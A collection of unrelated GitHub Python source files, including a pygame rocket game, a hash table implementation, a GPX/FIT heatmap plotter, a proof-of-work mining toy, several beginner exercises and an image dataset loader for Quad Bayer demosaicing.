{"seq_id":"43723553521","text":"import math\nimport pygame\nimport random\nimport time\n\n\ndef remove_object_off_screen(obj_x, obj_y, obj_speed):\n    for i in range(len(obj_x)):\n        if obj_y[i] > HEIGHT:\n            obj_y.pop(i)\n            obj_x.pop(i)\n            obj_speed.pop(i)\n            return\n\ndef remove_object(obj_x, obj_y, obj_speed, index):\n    obj_y.pop(index)\n    obj_x.pop(index)\n    obj_speed.pop(index)\n    \ndef update_position(obj, obj_speed):\n    for 
i in range(len(obj)):\n        obj[i] += obj_speed[i]\n    \ndef create_object(obj_x, obj_y, obj_speed):\n    obj_x.append(random.randint(0, WIDTH - OBJECT_SIZE))\n    obj_y.append(0 - OBJECT_SIZE)\n    obj_speed.append(random.randint(2,7))\n    \n\n    \n\n# Initialize Pygame\npygame.init()\n\n# Constants\nWIDTH, HEIGHT = 1920, 1080\nPLAYER_SIZE = 246\nOBJECT_SIZE = 160\nPLAYER_SPEED = 5\nWHITE = (255, 255, 255)\nBLUE = (0, 0, 255)\nRED = (255, 0, 0)\nGREEN = (0, 255, 0)\nDELAY = time.time_ns\n\n# Create the screen\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\npygame.display.set_caption(\"Rocket Game\")\n\n# Load images\nplayer_img = pygame.image.load(\"resources/cohete_on_wf.png\")\nenemy_img = pygame.image.load(\"resources/Rock Pile.png\")\nfuel_img = pygame.image.load(\"resources/fuel.png\")\nmoon_img = pygame.image.load(\"resources/moon.png\")\nbackground_img = pygame.image.load(\"resources/back.png\")\n\n# Initialize Pygame fonts\npygame.font.init()\nfont = pygame.font.Font(None, 36)\n\n# Initialize moon position\nmoon_x = WIDTH // 2 - 256\nmoon_y = -256\n\n# Initialize player position\nplayer_x = WIDTH // 2 - PLAYER_SIZE // 2\nplayer_y = HEIGHT - PLAYER_SIZE\nplayer_x_change = 0\n\n# Initialize enemy position\nenemy_x = []\nenemy_y = []\nenemy_y_speed = []\n\n# Initialize fuel position\nfuel_x = []\nfuel_y = []\nfuel_y_speed = []\n\n# Initialize fuel level\nfuel_level = 100\n\n# Initialize variables for score\nscore = 1\n\n# Game loop\nrunning = True\nwhile running:\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            running = False\n        if event.type == pygame.KEYDOWN:\n            if event.key == pygame.K_q:\n                running = False\n            if fuel_level > 0:\n                if event.key == pygame.K_LEFT:\n                    player_x_change = -PLAYER_SPEED\n                if event.key == pygame.K_RIGHT:\n                    player_x_change = PLAYER_SPEED\n                if event.key == pygame.K_LSHIFT or event.key == pygame.K_RSHIFT:\n                    PLAYER_SPEED *= 3 # Triple the player speed while Shift is held\n            elif event.key == pygame.K_r:\n                # Reset the game\n                fuel_level = 100\n                player_x = WIDTH // 2 - PLAYER_SIZE // 2\n                player_y = HEIGHT - PLAYER_SIZE\n                score = 1\n        if event.type == pygame.KEYUP:\n            if event.key == pygame.K_LSHIFT or event.key == pygame.K_RSHIFT:\n                PLAYER_SPEED /= 3 # Reset player speed to normal when Shift key is released\n            if player_x_change > 0:\n                if event.key == pygame.K_RIGHT:\n                    player_x_change = 0\n            else:\n                if event.key == pygame.K_LEFT:\n                    player_x_change = 0\n\n\n    player_x += player_x_change\n\n    # Boundaries for the player\n    if player_x < 0 - PLAYER_SIZE/4:\n        player_x = 0 - PLAYER_SIZE/4\n    elif player_x > WIDTH - PLAYER_SIZE * 0.75:\n        player_x = WIDTH - PLAYER_SIZE * 0.75\n\n    # Delete enemy and fuel\n    remove_object_off_screen(enemy_x, enemy_y, enemy_y_speed)\n    remove_object_off_screen(fuel_x, fuel_y, fuel_y_speed)\n    \n    # Move enemy and fuel\n    update_position(enemy_y, enemy_y_speed)\n    update_position(fuel_y, fuel_y_speed)\n\n    # Respawn enemy and fuel\n    if fuel_level > 0:\n        if random.randint(1,40) == 1:\n            create_object(enemy_x, enemy_y, enemy_y_speed)\n        if random.randint(1,150) == 1:\n            create_object(fuel_x, fuel_y, fuel_y_speed)\n\n    # Check for collision with enemy\n    for i in range(len(enemy_x)):\n        if (\n            player_x + 60 < enemy_x[i] + OBJECT_SIZE\n            and player_x + PLAYER_SIZE - 60 > enemy_x[i]\n            and player_y < enemy_y[i] + OBJECT_SIZE\n            and player_y + PLAYER_SIZE > enemy_y[i]\n        ):\n            fuel_level -= 20\n            remove_object(enemy_x, enemy_y, enemy_y_speed, i)\n            break\n    \n\n    # Check for collision with fuel\n    for i in range(len(fuel_x)):\n        if (\n            player_x + 60 < fuel_x[i] + OBJECT_SIZE\n            and player_x + 
PLAYER_SIZE - 60 > fuel_x[i]\n            and player_y < fuel_y[i] + OBJECT_SIZE\n            and player_y + PLAYER_SIZE > fuel_y[i]\n        ):\n            fuel_level += 15\n            remove_object(fuel_x, fuel_y, fuel_y_speed, i)\n            break\n    \n    # Reduce fuel based on time\n    if score % 100 == 0:\n        fuel_level -= 1\n\n    # Keep fuel level within bounds\n    if fuel_level < 0:\n        fuel_level = 0\n    elif fuel_level > 100:\n        fuel_level = 100\n\n    # Clear the screen\n    screen.blit(background_img, (0,0))\n\n    # Draw player, enemy, and fuel\n    screen.blit(player_img, (player_x, player_y))\n    screen.blit(moon_img, (moon_x, moon_y))\n    for i in range(len(enemy_x)):\n        screen.blit(enemy_img, (enemy_x[i], enemy_y[i]))\n    for i in range(len(fuel_x)):\n        screen.blit(fuel_img, (fuel_x[i], fuel_y[i]))\n\n    # Draw fuel level\n    pygame.draw.rect(screen, GREEN, (10, 10, fuel_level * 2, 20))\n    pygame.draw.rect(screen, RED, (10, 10, 200, 20), 2)\n    \n    # Drawing score\n    if fuel_level > 0:\n        score += 1\n    score_text = font.render(f\"Score: {math.floor(score / 150)}\", True, BLUE)\n    score_rect = score_text.get_rect()\n    score_rect.topleft = (10, 50)\n    screen.blit(score_text, score_rect)\n    \n    pygame.display.update()\n    if fuel_level <= 0:\n        for i in range(len(enemy_x)):\n            remove_object(enemy_x,enemy_y, enemy_y_speed, i)\n            break\n        for i in range(len(fuel_x)):\n            remove_object(fuel_x,fuel_y, fuel_y_speed, i)\n            break\n        game_over_text = font.render(\"Game Over\", True, RED)\n        game_over_rect = game_over_text.get_rect()\n        game_over_rect.center = (WIDTH // 2, HEIGHT // 2)\n        screen.blit(game_over_text, game_over_rect)\n\n        retry_text = font.render(\"Press R to retry or Q to quit\", True, BLUE)\n        retry_rect = retry_text.get_rect()\n        retry_rect.center = (WIDTH // 2, HEIGHT // 2 + 40)\n        screen.blit(retry_text, retry_rect)\n\n        pygame.display.update()\n\n# Quit the game\npygame.quit()\n\n\n","repo_name":"Fefd-Dev/GAME-JAM","sub_path":"moon-theme/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"40357844438","text":"from rembg import remove\nfrom PIL import Image\nimport os\n\ndef rem_bg():\n\n    for i in range(3):\n        # Read the input file 'insta_{i}.jpg' from static/original\n        filename = f'insta_{i}.jpg'\n        filepath = os.path.join('static/original', filename)\n        im = Image.open(filepath)\n\n        # Process the image with the remove function\n        output = remove(im)\n\n        # Save the image to static/nobackground as 'nobg_{i}.png'\n        outfilename = f'nobg_{i}.png'\n        outfilepath = os.path.join('static/nobackground', outfilename)\n        output.save(outfilepath)","repo_name":"yoannikaros/people_characteristics","sub_path":"functions/removebg.py","file_name":"removebg.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"16932331826","text":"\r\nN = int(input(\"Enter the number of students: \"))\r\nK = 10 ** 3\r\na = []*K\r\nb = []*K\r\nd = \"#\"\r\nc = b = str(\"\")\r\nfor i in range(K):\r\n    a.append(input(\"Enter a number: \"))\r\n    if a[i] == d:\r\n        break\r\nx = a.pop()\r\nfor i in range(len(a)):\r\n    a[i] = int(a[i])\r\n    print(a)\r\n#def sorter(item):\r\n#    student_id = 10 - item[1]\r\n#    value = 10 - item[2]\r\n#    print(student_id)\r\n#    return (student_id, value)\r\n    #a = []a.sort(key=lambda x: len(x))a[]a.sort(key=lambda x: len(x), reverse=True)[]\r\n#    return a\r\n#sorted_list = sorted(a, 
key=sorter)\r\n\r\nprint(a)\r\n#print(b)\r\n#print(sorted_list)","repo_name":"sasha39612/Algoritm_on_Pyhont_MFTI","sub_path":"Exercise_6_E_MFTI_not_done.py","file_name":"Exercise_6_E_MFTI_not_done.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"35898432462","text":"import random\n\n\n\nclass LinearProbingHashST:\n\t_INIT_CAPACITY = 10\n\t# initializes an empty hash table\n\tdef __init__(self, m = None):\n\t\tif m is None:\n\t\t\tm = self._INIT_CAPACITY\n\t\t# number of elements in the table\n\t\tself._n = 0 \n\t\t# size of the linear-probing table\n\t\tself._m = m\n\t\t# parallel lists holding the keys and values\n\t\tself._keys = [None] * self._m\n\t\tself._vals = [None] * self._m\n\n\t# resize the hash table to the given capacity,\n\t# then rehash all the previous keys.\n\tdef _resize(self, capacity):\n\t\ttemp = LinearProbingHashST(capacity)\n\t\tfor i in range(0, self._m):\n\t\t\tif self._keys[i] is not None:\n\t\t\t\ttemp.put(self._keys[i], self._vals[i])\n\n\t\tself._keys = temp._keys\n\t\tself._vals = temp._vals\n\t\tself._m = temp._m\n\t\tself._n = temp._n\n\n\t# hash the value between 0 and m-1\n\tdef _hash(self, key):\n\t\treturn (hash(key) & 0x7fffffff) % self._m\n\n\t# returns the number of key-value pairs in this hash table\n\tdef size(self):\n\t\treturn self._n\n\n\t# returns True if the hash table is empty\n\tdef isEmpty(self):\n\t\treturn self.size() == 0\n\n\t# returns True if this hash table contains the specified key.\n\tdef contains(self, key):\n\t\treturn (self.get(key) is not None)\n\n\t# Returns the value associated with the specified key in this symbol table.\n\tdef get(self, key):\n\t\ti = self._hash(key)\n\t\twhile self._keys[i] is not None:\n\t\t\tif self._keys[i] == key:\n\t\t\t\treturn self._vals[i]\n\t\t\ti = (i + 1) % self._m\n\t\treturn None\n\n\t# Inserts the specified key-value pair into the symbol table, overwriting the old \n\t# value with the new value if the symbol table already contains the specified key.\n\t# Deletes the specified key (and its associated value) from this symbol table\n\t# if the specified value is None\n\tdef put(self, key, value):\n\t\tif value is None:\n\t\t\tself.delete(key)\n\t\t\treturn\n\n\t\t# double the table size if it's 50% full\n\t\tif self._n >= self._m // 2:\n\t\t\tself._resize(2 * self._m)\n\n\t\ti = self._hash(key)\n\t\twhile self._keys[i] is not None:\n\t\t\tif self._keys[i] == key:\n\t\t\t\tself._vals[i] = value\n\t\t\t\treturn\n\t\t\ti = (i + 1) % self._m\n\n\t\tself._keys[i] = key\n\t\tself._vals[i] = value\n\t\tself._n += 1\n\n\t# Removes the specified key and its associated value from this symbol table \n\t# (if the key is in this symbol table). 
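\n\t# NOTE (added): deletion below clears the slot, then removes and re-inserts\n\t# every key in the same probe cluster so later lookups can still reach them.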
\n\tdef delete(self, key):\n\t\tif self.contains(key) == False:\n\t\t\treturn \n\t\ti = self._hash(key)\n\t\twhile self._keys[i] != key:\n\t\t\ti = (i + 1) % self._m\n\n\t\tself._keys[i] = None\n\t\tself._vals[i] = None\n\n\t\ti = (i + 1) % self._m\n\t\t# rehash all keys in same cluster\n\t\twhile self._keys[i] is not None:\n\t\t\t# delete keys[i] and vals[i] and reinsert\n\t\t\tkey_to_rehash = self._keys[i]\n\t\t\tval_to_rehash = self._vals[i]\n\t\t\tself._keys[i] = None\n\t\t\tself._vals[i] = None\n\t\t\tself._n -= 1\n\t\t\tself.put(key_to_rehash, val_to_rehash)\n\t\t\ti = (i + 1) % self._m\n\n\t\tself._n -= 1\n\n\t\t# halve table size if it's 12.5% full or less\n\t\tif self._n > 0 and self._n <= self._m // 8:\n\t\t\tself._resize(self._m // 2)\n\n\n\t# returns list of keys in the hash table\n\tdef keys(self):\n\t\toutput_keys = []\n\t\tfor i in range(0, self._m):\n\t\t\tif self._keys[i] is not None:\n\t\t\t\toutput_keys.append(self._keys[i])\n\t\treturn output_keys\n\n\nif __name__ == \"__main__\":\n\tst = LinearProbingHashST()\n\tinput_list = list(range(0, 256))\n\trandom.shuffle(input_list)\n\tfor num in input_list:\n\t\tst.put(str(num), num)\n\n\tfor s in st.keys():\n\t\tprint(s, st.get(s))\n\t\tst.delete(s)\n\n\n\n","repo_name":"monkeybarzz/free-algos","sub_path":"3_searching/linear_probing_hash_st.py","file_name":"linear_probing_hash_st.py","file_ext":"py","file_size_in_byte":3303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"26406509138","text":"from datetime import date\natual = date.today().year\nnovo = 0\nvelho = 0\nfor c in range(1, 8):\n    x = int(input(f'In what year was person {c} born? '))\n    if atual - x < 18:\n        novo += 1\n    else:\n        velho += 1\nprint(f'In total we had {velho} people of legal age')\nprint(f'And we also had {novo} people under age.')\n","repo_name":"KKBittencourtZ/LevelUp","sub_path":"Python/chalendsPython/ex054.py","file_name":"ex054.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73632868533","text":"\nfrom sys import stdin\n\nclass Solution:\n\n    def __init__(self):\n        self.results = []\n        pass\n\n    def commonChars(self, chars):\n        if (len(chars) < 1):\n            print(\"\")\n            return\n        # write code here\n        charCountMaps = []\n        firstString = chars[0]\n        for s in chars:\n            length = len(s)\n            charCountMap = {}\n            for i in range(length):\n                c = s[i]\n                if (c not in charCountMap.keys()):\n                    charCountMap[c] = 1\n                else:\n                    charCountMap[c] = charCountMap[c] + 1;\n            charCountMaps.append(charCountMap)\n        result = []\n        for c in firstString:\n            ok = True\n            for charCountMap in charCountMaps:\n                if (c in charCountMap.keys() and charCountMap[c] >= 1):\n                    charCountMap[c] = charCountMap[c] - 1\n                else:\n                    ok = False\n                    break\n            if (ok):\n                result.append(c)\n        result.sort()\n        print(\"\".join(result))\n\n    def min_send(self, nums, m):\n\n        self.devide(nums, m, 0)\n        return min(self.results)\n\n    def devide(self, left_nums, left_devide, temp_Max):\n        if (left_devide == 1):\n            temp_sum = sum(left_nums);\n            if (temp_sum > temp_Max):\n                self.results.append(temp_sum)\n            else:\n                self.results.append(temp_Max);\n        else:\n            length = len(left_nums)\n            if (length < left_devide):\n                return\n            if (length == left_devide):\n                _temp_Max = max(left_nums)\n                if (_temp_Max > temp_Max):\n                    self.results.append(_temp_Max)\n                else:\n                    self.results.append(temp_Max);\n                return\n            for i in range(0, length):\n                temp_nums = left_nums[0 : i + 1]\n                temp_sum = sum(temp_nums)\n                if 
(temp_sum > temp_Max):\n temp_Max = temp_sum;\n temp_left_nums = left_nums[i + 1 : length]\n self.devide(left_nums = temp_left_nums, left_devide = left_devide - 1, temp_Max = temp_Max)\n\n def find_diff_char(self, str1, str2):\n length1 = len(str1)\n length2 = len(str2)\n result1 = 0\n result2 = 0\n for i in range(length1):\n result1 = result1 + int(str1[i])\n for i in range(length2):\n result2 = result2 + int(str2[i])\n print(result2 - result1)\n\nif __name__ == '__main__':\n # chars = [\"bella\",\"labela\",\"rollera\", \"ela\", \"\"]\n # chars = [\"bella\"]\n s = Solution();\n # s.commonChars(chars)\n nums = [4,3,5,10,12]\n m = 2\n result = s.min_send(nums, m)\n print(\"min max : {0}\".format(result))\n # str1, str2 = \"abcd\",\"abcde\"\n # s.find_diff_char(str1, str2)\n","repo_name":"mouseM/learningMouse","sub_path":"LeCode/SXF.py","file_name":"SXF.py","file_ext":"py","file_size_in_byte":2892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20469921145","text":"import os\nimport glob\n\nimport folium\nimport gpxpy\n\nimport numpy as np\nimport pandas as pd\nfrom geopy.geocoders import Nominatim\n\ngeolocator = Nominatim()\nlocation = geolocator.geocode(\n \"Montreal Quebec\"\n) # Change this to change location centering\nlat_check = float(location.raw[\"lat\"])\nlon_check = float(location.raw[\"lon\"])\n\ndata = glob.glob(\"*.gpx\")\nfitdata = glob.glob(\"*.fit\")\n\nif not len(fitdata) == 0:\n print(\"Converting Garmin FIT files\")\n os.system(\"python fit_to_csv.py\")\n os.system(\"mkdir fit_files\")\n os.system(\"mv *.fit ./fit_files\")\n\ncsvdata = glob.glob(\"*.csv\")\n\nlat = []\nlon = []\n\nall_lat = []\nall_long = []\n\nprint(\"Loading data\")\n\nfor activity in data:\n gpx_filename = activity\n gpx_file = open(gpx_filename, \"r\")\n gpx = gpxpy.parse(gpx_file)\n\n for track in gpx.tracks:\n for segment in track.segments:\n for point in segment.points:\n lat.append(point.latitude)\n lon.append(point.longitude)\n\n check1 = np.any(\n np.isclose(lat, lat_check, atol=0.5)\n ) # Change the tolerance 'atol' to include a larger or smaller area around the centering point\n check2 = np.any(\n np.isclose(lon, lon_check, atol=0.5)\n ) # Change the tolerance 'atol' to include a larger or smaller area around the centering point\n\n if check1 and check2:\n all_lat.append(lat)\n all_long.append(lon)\n\n lon = []\n lat = []\n\nfor activity in csvdata:\n csv_filename = activity\n csv_file = pd.read_csv(csv_filename)\n\n for i in range(len(csv_file)):\n lat.append(csv_file[\"position_lat\"][i])\n lon.append(csv_file[\"position_long\"][i])\n\n check1 = np.any(\n np.isclose(lat, lat_check, atol=0.5)\n ) # Change the tolerance 'atol' to include a larger or smaller area around the centering point\n check2 = np.any(\n np.isclose(lon, lon_check, atol=0.5)\n ) # Change the tolerance 'atol' to include a larger or smaller area around the centering point\n\n if check1 and check2:\n all_lat.append(lat)\n all_long.append(lon)\n\n lon = []\n lat = []\n\nall_lat = all_lat[0]\nall_long = all_long[0]\n\ncentral_long = sum(all_long) / float(len(all_long))\ncentral_lat = sum(all_lat) / float(len(all_lat))\n\nprint(\"Initializing map\")\nm = folium.Map(\n location=[central_lat, central_long], tiles=\"Stamen Toner\", zoom_start=14.2\n) # Recommended map styles are \"Stamen Terrain\", \"Stamen Toner\"\n\nprint(\"Plotting gpx data\")\n\nfor activity in data:\n gpx_filename = activity\n gpx_file = open(gpx_filename, \"r\")\n gpx = gpxpy.parse(gpx_file)\n\n 
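# NOTE (added): GPX files nest track -> segment -> point; the loops below flatten that hierarchy into flat coordinate lists.\n    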
for track in gpx.tracks:\n for segment in track.segments:\n for point in segment.points:\n lat.append(point.latitude)\n lon.append(point.longitude)\n\n points = zip(lat, lon)\n points = [item for item in zip(lat, lon)]\n\n folium.PolyLine(points, color=\"red\", weight=2.5, opacity=0.5).add_to(m)\n lat = []\n lon = []\n\nprint(\"Plotting csv data\")\ncolor = \"red\"\nhr = []\nfor activity in csvdata:\n csv_filename = activity\n csv_file = pd.read_csv(csv_filename)\n for i in range(len(csv_file)):\n lat.append(csv_file[\"position_lat\"][i])\n lon.append(csv_file[\"position_long\"][i])\n hr.append(csv_file[\"heart_rate\"][i])\n points = zip(lat, lon)\n points = [item for item in zip(lat, lon)]\n\n # color = []\n # print('heart_rate',csv_file['heart_rate'])\n # hr = hr / max(hr)\n # for value in hr:\n # if value < 0.2:\n # color.append(\"darkred\")\n # elif value >= 0.2 and value < 0.4:\n # color.append(\"red\")\n # elif value >= 0.4 and value < 0.6:\n # color.append(\"lightred\")\n # elif value >= 0.6 and value < 0.8:\n # color.append(\"lightyellow\")\n # elif value >= 0.6:\n # color.append(\"yellow\")\n\n folium.PolyLine(points, color=color, weight=2.5, opacity=0.5).add_to(m)\n lat = []\n lon = []\n hr = []\n\nm.save(\"heatmap.html\")\n","repo_name":"mrhheffernan/PythonHeatmap","sub_path":"personal_heatmap.py","file_name":"personal_heatmap.py","file_ext":"py","file_size_in_byte":3975,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"34319386237","text":"import hashlib\n\n\nclass Block:\n def __init__(self, content, difficulty=1):\n self._content = content\n self._nonce = 0\n self._hash = None\n self.difficulty = difficulty\n self.algo_nonce()\n\n @property\n def nonce(self):\n return self._nonce\n\n @nonce.setter\n def nonce(self, nonce):\n self._nonce = nonce\n self._update_hash()\n\n def _update_hash(self):\n msg = hashlib.sha512()\n msg.update('{}{}'.format(self._content, self._nonce).encode())\n self._hash = msg.hexdigest()\n return self._hash\n\n def __str__(self):\n return '=== Block ===\\nContent: {}\\nNonce : {}\\nHash : {}'.format(self._content, self._nonce, self._hash)\n\n def sum_numbers_hash(self):\n result = 0\n for item in self._update_hash():\n try: \n result += int(item)\n except: \n pass\n return result\n\n def count_occurrences(self):\n dico = {}\n for elem in self._update_hash():\n try:\n dico[elem] += 1\n except:\n dico[elem] = 1\n value_max = 0\n for key in dico:\n if dico[key] > value_max:\n value_max = int(dico[key])\n\n return value_max\n\n def algo_nonce(self):\n nonce = 0 \n while (\n not self._update_hash().startswith('0' * self.difficulty)\n ) or (\n self.sum_numbers_hash() % self.difficulty\n ) or (\n self.count_occurrences() < self.difficulty + 14):\n # (x % y) is the same as (x % y != 0)\n nonce += 1\n self._nonce = nonce\n\nif __name__ == '__main__':\n a = Block('Foo')\n print(a)\n\n a = Block('Foo', 2)\n print(a)\n\n a = Block('Foo', 3)\n print(a)\n\n a = Block('Foo', 4)\n print(a)\n","repo_name":"haroldsnyers/microCourses","sub_path":"BlockChain/Coding2/Mining.py","file_name":"Mining.py","file_ext":"py","file_size_in_byte":1857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20359596267","text":"from .ops import CheckBoundsOp\nfrom .defaults import defaults\nfrom .math import cast\nfrom .compat import tt\nimport numpy as np\n\n\nclass ContrastIntegral:\n def __init__(self, c, n, child=None, ydeg=defaults[\"ydeg\"], **kwargs):\n assert 
child is not None\n        self._child = child\n        self._ydeg = ydeg\n        self._nylm = (self._ydeg + 1) ** 2\n        self._c = cast(c)\n        self._n = CheckBoundsOp(name=\"n\", lower=0, upper=np.inf)(n)\n\n        # Compute the full Ylm mean and covariance weighted by\n        # the spot contrast & number of spots\n        mom1 = self._child.first_moment()\n        eig_mom2 = self._child.second_moment()\n        mom2 = tt.dot(eig_mom2, tt.transpose(eig_mom2))\n        self._mean = np.pi * self._c * self._n * mom1\n        self._cov = (\n            (np.pi * self._c) ** 2 * self._n * (mom2 - tt.outer(mom1, mom1))\n        )\n\n        # Stability hacks\n        epsy = kwargs.pop(\"epsy\", defaults[\"epsy\"])\n        epsy15 = kwargs.pop(\"epsy15\", defaults[\"epsy15\"])\n        lam = np.ones(self._nylm) * epsy\n        lam[15 ** 2 :] = epsy15\n        lam = tt.diag(lam)\n        self._cov += lam\n\n    def mean(self):\n        return self._mean\n\n    def cov(self):\n        return self._cov\n","repo_name":"rodluger/starry_process","sub_path":"starry_process/contrast.py","file_name":"contrast.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"21"}
{"seq_id":"1963019738","text":"# function to get an integer as input, using recursive function\ndef get_int(string):\n    x = input(string)\n    try:\n        return int(x)\n    except ValueError:\n        return get_int(string)\n\n# function to get a valid departing train time\ndef get_valid_up_time(timings):\n    time = get_int(\"Train time: \")\n    # makes sure that a train is present on the input time by referencing the timings\n    while time not in timings:\n        print(\"There is no train at this time. Choose another train\")\n        time = get_int(\"Train time: \")\n    return time\n\n# recursive function to get a valid down time\ndef get_valid_down_time(t1, timings):\n    time = get_int(\"Train time: \")\n    # makes sure that train is present on input time\n    while time not in timings:\n        print(\"There is no train at this time. 
Choose another train\")\n time = get_int(\"Train time: \")\n # makes sure arrival is not before departure(only checks this when wrong time is given once)\n while time < t1:\n time = get_int(\"Train time: \")\n # if correct arrival time is given, but it is before departure time, function repeats, stopping only when arrival time is fully validated\n if time < t1:\n get_valid_down_time(t1, timings)\n\n return time\n","repo_name":"Dinoman44/PreReleaseSolution","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30629292565","text":"import os\r\nimport cv2\r\nimport random\r\nimport numpy as np\r\nimport torch\r\nfrom torch.utils.data import Dataset\r\n\r\nimport util.dataset_aug as DA\r\n\r\ndef get_heads_train(path):\r\n # read a folder, return the image name\r\n ret = []\r\n for root, dirs, files in os.walk(path):\r\n for filespath in files:\r\n head = filespath.split('_')[0]\r\n if head not in ret:\r\n ret.append(head)\r\n return ret\r\n\r\ndef get_heads_train_patch(path):\r\n # read a folder, return the image name\r\n ret = []\r\n for root, dirs, files in os.walk(path):\r\n for filespath in files:\r\n head = filespath.split('_')[0] + '_' + filespath.split('_')[1]\r\n if head not in ret:\r\n ret.append(head)\r\n return ret\r\n\r\ndef get_raw_test(path):\r\n # read a folder, return the complete path\r\n ret = []\r\n for root, dirs, files in os.walk(path):\r\n for filespath in files:\r\n if filespath[-4:] == '.raw':\r\n ret.append(os.path.join(root, filespath))\r\n return ret\r\n\r\nclass QuadBayer2RGB_Dataset(Dataset):\r\n def __init__(self, opt):\r\n self.opt = opt\r\n\r\n # Build training dataset\r\n self.train_list = get_heads_train(opt.baseroot_train)\r\n self.train_blur_patch_list = get_heads_train_patch(opt.baseroot_train_blur_patch)\r\n self.train_salient_patch_list = get_heads_train_patch(opt.baseroot_train_salient_patch)\r\n self.train_joint_patch_list = get_heads_train_patch(opt.baseroot_train_joint_patch)\r\n\r\n # Specify the pos for short and long exposure pixels\r\n if opt.short_expo_per_pattern == 2:\r\n self.short_pos = [[0,0], [1,1]]\r\n self.long_pos = [[0,1], [1,0]]\r\n if opt.short_expo_per_pattern == 3:\r\n self.short_pos = [[0,0], [0,1], [1,0]]\r\n self.long_pos = [[1,1]]\r\n\r\n def random_crop_start(self, h, w, crop_size, min_divide):\r\n rand_h = random.randint(0, h - crop_size)\r\n rand_w = random.randint(0, w - crop_size)\r\n rand_h = (rand_h // min_divide) * min_divide\r\n rand_w = (rand_w // min_divide) * min_divide\r\n return rand_h, rand_w\r\n \r\n def get_train_img(self):\r\n train_rid = random.randint(0, len(self.train_list) - 1)\r\n train_img_input_path = os.path.join(self.opt.baseroot_train, self.train_list[train_rid] + self.opt.ablation_data + '.png')\r\n train_img_rawout_path = os.path.join(self.opt.baseroot_train, self.train_list[train_rid] + '_quadbayer_short.png')\r\n train_img_rgbout_path = os.path.join(self.opt.baseroot_train, self.train_list[train_rid] + '_rgb_gt.png')\r\n train_img_input = cv2.imread(train_img_input_path, -1)\r\n train_img_rawout = cv2.imread(train_img_rawout_path, -1)\r\n train_img_rgbout = cv2.imread(train_img_rgbout_path, -1)\r\n return train_img_input, train_img_rawout, train_img_rgbout\r\n \r\n def get_blur_patch(self):\r\n train_blur_patch_rid = random.randint(0, len(self.train_blur_patch_list) - 1)\r\n train_blur_patch_input_path = 
os.path.join(self.opt.baseroot_train_blur_patch, self.train_blur_patch_list[train_blur_patch_rid] + self.opt.ablation_data + '.png')\r\n train_blur_patch_rawout_path = os.path.join(self.opt.baseroot_train_blur_patch, self.train_blur_patch_list[train_blur_patch_rid] + '_quadbayer_short.png')\r\n train_blur_patch_rgbout_path = os.path.join(self.opt.baseroot_train_blur_patch, self.train_blur_patch_list[train_blur_patch_rid] + '_rgb_gt.png')\r\n train_blur_patch_input = cv2.imread(train_blur_patch_input_path, -1)\r\n train_blur_patch_rawout = cv2.imread(train_blur_patch_rawout_path, -1)\r\n train_blur_patch_rgbout = cv2.imread(train_blur_patch_rgbout_path, -1)\r\n return train_blur_patch_input, train_blur_patch_rawout, train_blur_patch_rgbout\r\n \r\n def get_salient_patch(self):\r\n train_salient_patch_rid = random.randint(0, len(self.train_salient_patch_list) - 1)\r\n train_salient_patch_input_path = os.path.join(self.opt.baseroot_train_salient_patch, self.train_salient_patch_list[train_salient_patch_rid] + self.opt.ablation_data + '.png')\r\n train_salient_patch_rawout_path = os.path.join(self.opt.baseroot_train_salient_patch, self.train_salient_patch_list[train_salient_patch_rid] + '_quadbayer_short.png')\r\n train_salient_patch_rgbout_path = os.path.join(self.opt.baseroot_train_salient_patch, self.train_salient_patch_list[train_salient_patch_rid] + '_rgb_gt.png')\r\n train_salient_patch_input = cv2.imread(train_salient_patch_input_path, -1)\r\n train_salient_patch_rawout = cv2.imread(train_salient_patch_rawout_path, -1)\r\n train_salient_patch_rgbout = cv2.imread(train_salient_patch_rgbout_path, -1)\r\n return train_salient_patch_input, train_salient_patch_rawout, train_salient_patch_rgbout\r\n \r\n def get_joint_patch(self):\r\n train_joint_patch_rid = random.randint(0, len(self.train_joint_patch_list) - 1)\r\n train_joint_patch_input_path = os.path.join(self.opt.baseroot_train_joint_patch, self.train_joint_patch_list[train_joint_patch_rid] + self.opt.ablation_data + '.png')\r\n train_joint_patch_rawout_path = os.path.join(self.opt.baseroot_train_joint_patch, self.train_joint_patch_list[train_joint_patch_rid] + '_quadbayer_short.png')\r\n train_joint_patch_rgbout_path = os.path.join(self.opt.baseroot_train_joint_patch, self.train_joint_patch_list[train_joint_patch_rid] + '_rgb_gt.png')\r\n train_joint_patch_input = cv2.imread(train_joint_patch_input_path, -1)\r\n train_joint_patch_rawout = cv2.imread(train_joint_patch_rawout_path, -1)\r\n train_joint_patch_rgbout = cv2.imread(train_joint_patch_rgbout_path, -1)\r\n return train_joint_patch_input, train_joint_patch_rawout, train_joint_patch_rgbout\r\n\r\n def __getitem__(self, index):\r\n\r\n # Number of images\r\n num_train_img, num_blur_patch, num_salient_patch, num_joint_patch \\\r\n = self.opt.num_input[0], self.opt.num_input[1], self.opt.num_input[2], self.opt.num_input[3]\r\n\r\n # Read images\r\n train_img_input, train_img_rawout, train_img_rgbout = self.get_train_img()\r\n if num_blur_patch 